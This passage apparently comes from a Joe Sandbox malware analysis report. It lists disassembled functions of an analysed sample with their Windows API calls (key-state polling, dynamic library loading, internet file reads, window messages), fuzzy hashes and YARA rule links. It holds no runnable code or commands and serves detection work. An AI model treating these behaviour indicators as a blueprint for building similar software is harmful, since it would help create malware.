                                                                                                                                                                                                                                                                                        • Instruction ID: cbe2d43e729c05d814b11c6f79667386120cdfdaa91b611029174d625b826074
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cb9d52b0d5c4f913bf7d96493971e2f203dfdfd506fbfe9159de80c34043b5f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 025147B5A04219EFCB14CF68C884EAAB7F8FF89314B158559E90ADB310E770E911CF90
                                                                                                                                                                                                                                                                                        Function 00F79540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F795F3
                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F7961F
                                                                                                                                                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F79677
                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F7969C
                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F796A4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 75a1ca5de707a802ff8af13bff399f59ccbd20b02af473ff48f66611a71aeabf
                                                                                                                                                                                                                                                                                        • Instruction ID: 39b81387f4508c83859b0d1473328ea37bfeeb27ec81f32fc77b6442c9604633
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75a1ca5de707a802ff8af13bff399f59ccbd20b02af473ff48f66611a71aeabf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F513B35A00619DFCB05DF54C881A6ABBF5FF48314F088059E849AB3A2CB75ED41EB91
                                                                                                                                                                                                                                                                                        Function 00F89941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F8999D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F89A2D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F89A49
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F89A8F
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F89AAF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F71A02,?,75C0E610), ref: 00F1F9F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F60354,00000000,00000000,?,?,00F71A02,?,75C0E610,?,00F60354), ref: 00F1FA18
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9702851a344b7056de9da4c1e1325722633c2beab4ef30ef952e181cca3628fd
                                                                                                                                                                                                                                                                                        • Instruction ID: 3529e35b8ae3bd55fadd903100be37897a4b3ade3a0c0ba06aa5c38d131069f9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9702851a344b7056de9da4c1e1325722633c2beab4ef30ef952e181cca3628fd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81515E35A04205DFCB05EF64C4859EDBBF0FF09324B188199E80A9B362D775ED86EB81
                                                                                                                                                                                                                                                                                        Function 00F975AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00F9766B
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00F97682
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00F976AB
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F7B5BE,00000000,00000000), ref: 00F976D0
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00F976FF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b630a51072384264087c5f471a0a820c85fc39dc95b29b00264305c58d2b813d
                                                                                                                                                                                                                                                                                        • Instruction ID: 80d6f3b41124960deb3857a62398f1683fac517b5da36eb5fc25dd0b5bccdaf3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b630a51072384264087c5f471a0a820c85fc39dc95b29b00264305c58d2b813d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7241E635E18708AFEB25EF6CCC48FAA7B65EB45360F150225F815A72E0D770AD11FA50
                                                                                                                                                                                                                                                                                        Function 00F323C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e62a89b1370c98318aa606078c471f201defb17c0dd1601f4ce7d8220de50c52
                                                                                                                                                                                                                                                                                        • Instruction ID: 9345aa7a1d5302ef9d035444f178707e2e0d0205e5ca2fbb6d4892491b52fff8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e62a89b1370c98318aa606078c471f201defb17c0dd1601f4ce7d8220de50c52
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA41D132E00214AFDB20DF78C981A5DB3E5EF88324F1545A8E915EB396DB35ED01EB80
                                                                                                                                                                                                                                                                                        Function 00F019CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F019E1
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00F019FE
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00F01A23
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00F01A3D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8050e5cb1a595fd32ad6651d738d5fc5504e1c43e5283fceaae526bc650dd869
                                                                                                                                                                                                                                                                                        • Instruction ID: 92708b2a7152ee044db64152db2166ba95894d84cf2ac5073b6d6daa90432c66
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8050e5cb1a595fd32ad6651d738d5fc5504e1c43e5283fceaae526bc650dd869
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68413D71A0411AFFDF159FA4C844BEEBB74FB45334F20821AE869A62D0C7386A54EB51
                                                                                                                                                                                                                                                                                        Function 00F742B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetInputState.USER32 ref: 00F74310
                                                                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F74367
                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00F74390
                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00F7439A
                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F743AB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a4ed1c51d38e84c1ff1c4ee134f6c4a695bb5c7df82d1c7d8a0e368318b154d5
                                                                                                                                                                                                                                                                                        • Instruction ID: e713f9d09630158ef048dd7b2f379cbebda68f045dbd874974f8948ae6056574
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4ed1c51d38e84c1ff1c4ee134f6c4a695bb5c7df82d1c7d8a0e368318b154d5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0631F57090534ADFEB75CB74D848BB63BA8AB10314F04856BE46EC21A0E374B845FB63
                                                                                                                                                                                                                                                                                        Function 00F6224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F62262
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00F6230E
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00F62316
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00F62327
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F6232F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 26551401f6c5eca2a881b65de10845b1612423c2d72eb50c5c40f5eee7adb234
                                                                                                                                                                                                                                                                                        • Instruction ID: 1054fb1eb3a8f75e3262d06e6e05bc432e1dd86a0b9d5540ea553d8246501cec
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26551401f6c5eca2a881b65de10845b1612423c2d72eb50c5c40f5eee7adb234
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D831A472900619EFDB14CFA8DD89ADE3BB5EB04325F104219FA25A72D1C7709954EB50
                                                                                                                                                                                                                                                                                        Function 00F7D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7D97D
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00F7D9B4
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7D9F9
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7DA0D
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7DA37
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4169122517345caddcfa157e123fa5d56ede88bfd4d9bd5ad03a000c536f2135
                                                                                                                                                                                                                                                                                        • Instruction ID: 5fda4ec755d6f81eb1d3b40fe285999828bca60420b995c383c5ea8d41c2f688
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4169122517345caddcfa157e123fa5d56ede88bfd4d9bd5ad03a000c536f2135
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF314F72904205EFDB20DFA5D884AAAB7F8EF04354B50842FE54AD2151D734ED40EB61
                                                                                                                                                                                                                                                                                        Function 00F961A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F961E4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F9623C
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9624E
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F96259
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F962B5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 04df2684c54f203f92e4bf4db2207f0390df57eb2845ee0c25687272ce43de95
                                                                                                                                                                                                                                                                                        • Instruction ID: 5f4f03f397affad27b0e2d6f83fce87a6e6bb0a6f6192ef232152b232a747b3c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04df2684c54f203f92e4bf4db2207f0390df57eb2845ee0c25687272ce43de95
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E219E31D00218AAEF219FA4CC84EEEBBB9EB45764F104217F925EA280D7709985EF51
                                                                                                                                                                                                                                                                                        Function 00F8138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00F813AE
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00F813C5
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F81401
                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00F8140D
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00F81445
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 56b42218b61dac2cfceb0fa9616fb71de61f1d7e476cb4d891242a18f3ec1483
                                                                                                                                                                                                                                                                                        • Instruction ID: 6f541955198a550e57d9b91767bdd1ca68662b7738c11e71789e0357f3a4750b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56b42218b61dac2cfceb0fa9616fb71de61f1d7e476cb4d891242a18f3ec1483
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37219336A00204AFD704EF65DC84A9EBBF9FF58340B14846AF84AD7751CA34AD04EF90
                                                                                                                                                                                                                                                                                        Function 00F3D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00F3D146
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F3D169
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F3D18F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3D1A2
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F3D1B1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4103f565b0f4d7f2a7b8ac79a7509062e3c3ef37bdb0935e3fd7cfb35c7525c7
                                                                                                                                                                                                                                                                                        • Instruction ID: 9e4a0a545d7cd5d7ac6b2704e63830f7f94ab601ac245129dbc3d02961a032d4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4103f565b0f4d7f2a7b8ac79a7509062e3c3ef37bdb0935e3fd7cfb35c7525c7
